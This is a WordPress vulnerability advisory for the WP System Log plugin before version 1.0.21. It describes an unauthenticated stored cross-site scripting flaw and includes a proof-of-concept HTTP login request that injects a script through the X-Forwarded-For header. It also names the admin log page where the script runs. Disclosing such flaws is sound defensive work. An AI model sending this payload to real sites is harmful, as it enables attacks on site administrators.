WordPress Plugin Vulnerabilities
WP System Log < 1.0.21 - Unauthenticated Stored Cross-Site Scripting
Description
The plugin does not sanitise, validate and escape the IP address retrieved from login requests before outputting them in the admin dashboard, which could allow unauthenticated attacker to perform Cross-Site Scripting attacks against admins viewing the logs.
Proof of Concept
POST /wp-login.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 54 X-Forwarded-For: <script>alert(/XSS/)</script> Connection: close Cookie: wordpress_test_cookie=WP+Cookie+check Upgrade-Insecure-Requests: 1 log=a&pwd=b&wp-submit=Log+In The XSS will be triggered in the Activity Log dashboard: /wp-admin/admin.php?page=winteractivitylog
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
wzy-ceb Attack defense
Submitter
wzy-ceb Attack defense
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-11-15 (about 2 years ago)
Added
2021-11-15 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)